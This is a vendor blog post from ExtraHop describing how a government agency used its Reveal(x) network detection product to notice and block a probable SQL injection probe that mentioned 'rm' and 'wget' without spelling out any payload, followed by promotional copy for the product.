Blog
SQL Injection Attack Example: Government Agency Detects Anomalous Queries
ExtraHop
May 21, 2021
Security threat detection is hard. Between the knowns and unknowns, every moment is critical, especially if your data is at risk.
SQL injection attacks (SQLi) were one of the main sources of data breaches in 2020. In this type of attack, SQL can't differentiate between the control and the data planes. Because of this, a bad actor can gain access and steal or delete your organization's data, change a website, or compromise a server to launch more attacks.
There's a massive prevalence of injection vulnerabilities on web applications, and the risks are well documented. However, pattern matching to detect SQLi is notoriously difficult, and the rules most tools use are often too noisy to be effective in a real-world deployment, causing security teams to tune out alerts. Undetected code injection can be the perfect storm that leaves behind a wake of devastating damage.
Detecting Anomalies
Recently, one US government agency detected a potential SQLi attack during a data review session using ExtraHop Reveal(x). Reveal(x) uses machine learning to establish baseline network patterns from traffic and commits them to record. From there, the captured information can be shared in a way that's observable over time.
For the government agency, Reveal(x) displayed some unusual indicators. For example, there appeared to be a UNIX 'rm' command, used to remove objects, as part of a query that was potentially targeting a gateway. The oddities continued with a 'wget' statement and the mention of a Netgear device as part of the query. To top it off, all of this was coming from an external client IP address geolocated in another country.
Because the HTTP status code was a 404, this was likely just a knock on the door. However, the government agency also detected several inbound SSH sessions from the same country. The agency took immediate action by deploying firewall policies, and they were able to validate that the suspicious traffic had stopped.
Simultaneous Strategies
All security teams need the ability to validate and remediate threats rapidly—just like the government agency did. The challenge is that most security technology is either too blunt or inherently reactive, adding to the time it takes to study compromise, identify attack signatures, and determine an attack stage. As SQLi attacks become more prevalent, advanced detectors must close these gaps.
When security tools, such as Reveal(x), apply advanced behavioral analytics, enabled by machine learning, security teams can close network blindspots. They can also eliminate noise from false flags, and detect, investigate, and respond to threats faster and more efficiently.
The security team at the government agency defended against SQLi with the help of complete network visibility and high-fidelity, behavior-based detectors that automatically and accurately alerted them to a threat before any damage was done. When faced with what could have been a damaging attack, Reveal(x) allowed the security team to quickly respond and stop it.
What could you detect with Reveal(x)? Find out by exploring the full platform running on example data in the Reveal(x) demo.
Discover more